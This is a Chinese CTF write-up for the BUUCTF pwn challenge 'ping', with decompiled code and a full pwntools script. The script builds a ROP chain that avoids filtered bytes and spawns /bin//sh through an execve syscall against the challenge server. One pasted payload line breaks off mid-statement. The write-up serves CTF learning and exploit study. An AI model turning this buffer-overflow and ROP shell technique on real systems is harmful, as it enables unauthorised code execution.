rop题
题目看上去不难，只有几段。
v7 = 322423550;
printf("ping> ");
_isoc99_scanf("%511s", src);
s = (char *)&unk_80BCEC8;
for ( i = src; *i; ++i ) // payload不能出现指定字符 ba c4 7 1c d1 ac 83 3 同时 a,0也不行
{
if ( strchr(s, *i) )
{
puts(&unk_80BCED1);
exit(-1);
}
}
v9 = src;
v8 = &src[strlen(src) - 1];
while ( v9 < v8 ) // 反转
{
v5 = *v9;
v0 = v9++;
*v0 = *v8;
v1 = v8--;
*v1 = v5;
}
printf("pong> %snn");
result = strcpy(dest, src);
if ( v7 != 322423550 ) // 检查v7 =
{
puts(&unk_80BCED1);
exit(-1);
}
return result;
}
- 先用scanf读入串
- 然后过滤禁用字符,这里就7比较麻烦
- 过滤后将串反转,并复制到dest,这里dest定义很小,有溢出
- 检查v7是否正确
- 然后就执行
静态编译的题有很多 rop 可用，padding 加上生成的 rop，反转后写进去就行了。但这里有个过滤 7；另外串由 scanf 读入，也不能有 0 或者 \n、\t 等字符。
做法就是先用 ROPgadget 的 ropchain 生成一个 payload，然后再把带禁用字符的部分改掉。
生成的内容:
payload = ''
payload += pack('
改好的内容:
"""Exploit script from the writeup for the BUUCTF pwn challenge "ping".

Builds a ROP chain that avoids the bytes the binary rejects (the
script's own note lists 0x07, 0x03 and 0x0a; the decompiled filter
loop in the writeup names a longer list, and 0x00 cannot be delivered
through ``scanf("%511s")`` either), then sends the chain *reversed*,
because the target reverses the received string in place before
``strcpy``-ing it into the undersized ``dest`` buffer.
"""
from pwn import *

# Toggle between a local process and the remote instance.  ``libc_elf``,
# ``one`` and ``offset_main_ret`` are set up for both targets but are not
# referenced by the chain below (the writeup describes the binary as
# statically compiled, which is presumably why they go unused).
local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF("/home/shi/libc6-i386_2.23-0ubuntu11.3/libc-2.23.so")
    # presumably one_gadget offsets for this libc build -- unused here
    one = [0x3a81c,0x3a81e,0x3a822,0x3a829,0x5f075,0x5f076]
    offset_main_ret = 0x18647
else:
    p = remote('node4.buuoj.cn', 25638)
    libc_elf = ELF('../libc6-i386_2.23-0ubuntu10_amd64.so')
    # presumably one_gadget offsets for this libc build -- unused here
    one = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
    offset_main_ret = 0x18637
elf = ELF('./pwn')
context(arch='i386', log_level='debug')

# Bytes that must not appear anywhere in the chain (see the filter loop
# in the decompiled code).
# no 07 03 0a
# Padding up to the stack slot the binary checks after strcpy, then
# 322423550 so that the `v7 != 322423550` test still passes, then
# presumably the rest of the padding up to the saved return address.
# The 0x230 / 0x20b distances come from the binary's stack layout --
# confirm against the disassembly before reusing them.
payload = b'A'*(0x230-0x20b)+ p32(322423550)+ b'A'*24

# Stage 1: write "/bin//sh" followed by a NUL dword into .data at
# 0x080ec030, one dword per `mov [edx], ecx`.  Note this gadget also
# does `mov eax, [esp + 4]`, so eax is garbage afterwards and is
# re-zeroed before it is used.
# 0x080ec030 /bin
payload += p32(0x0806fe6a) # pop edx ; ret
payload += p32(0x080ec030) # @ .data c000 -> c020
payload += p32(0x080e05f5) # pop ecx ; ret
payload += b'/bin'
payload += p32(0x0805fa54) # 0x0805fa54 : mov dword ptr [edx], ecx ; mov eax, dword ptr [esp + 4] ; ret
# 0x080ec030 /bin//sh
payload += p32(0x0806fe6a) # pop edx ; ret
payload += p32(0x080ec034) # @ .data + 4
payload += p32(0x080e05f5) # pop ecx ; ret
payload += b'//sh'
payload += p32(0x0805fa54) # 0x0805fa54 : mov dword ptr [edx], ecx ; mov eax, dword ptr [esp + 4] ; ret
# 0x080ec030 /bin//sh
# NUL terminator: zero eax and store it at .data + 8.
payload += p32(0x0806fe6a) # pop edx ; ret
payload += p32(0x080ec038) # @ .data + 8
payload += p32(0x08049573) # xor eax, eax ; ret
payload += p32(0x0805596b) # mov dword ptr [edx], eax ; ret

# Stage 2: eax = 11 (the i386 execve syscall number) without a
# `pop eax` gadget: zero it, then eleven `inc eax ; pop edi ; ret`,
# each followed by a filler dword that the `pop edi` consumes.
#eax=11 xor eax,eax; inc eax; pop edi; xxx
payload += p32(0x08049573) # xor eax, eax ; ret
payload += (p32(0x0805d633)+ b'AAAA')*11 # 0x0805d633 : inc eax ; pop edi ; ret

# Stage 3: syscall arguments.  ebx -> "/bin//sh", ecx and edx -> the
# NUL dword written above (empty argv / envp).
# ebx = 0x080ec030 (the "/bin//sh" string in .data)
payload += p32(0x080e1655) # pop ebx ; ret
payload += p32(0x080ec030) # @ .data
# ecx = 0x080ec038 (the NUL dword in .data)
payload += p32(0x080e05f5) # pop ecx ; ret
payload += p32(0x080ec038) # @ .data
# edx = 0x080ec038 (the NUL dword in .data)
payload += p32(0x0806fe6a) # pop edx ; ret
payload += p32(0x080ec038) # @ .data + 8
payload += p32(0x0806d9c5) # int 0x80

#gdb.attach(p, "b*0x8048bbe")
# The binary reverses the input string in place before strcpy, so the
# chain is sent backwards to land in the right order on the stack.
# sendline appends '\n', which is what terminates scanf's %511s read.
p.sendlineafter(b"ping> ", payload[::-1])
p.recv()
p.sendline(b'cat /flag')
p.interactive()
这里带 7 的比较麻烦，因为程序一大段都在 0x0807xxxx 上，很多 rop 被禁用了。还有 a（0x0a）也不能用。


![[BUUCTF-pwn] ping [BUUCTF-pwn] ping](http://www.mshxw.com/aiimages/31/676355.png)
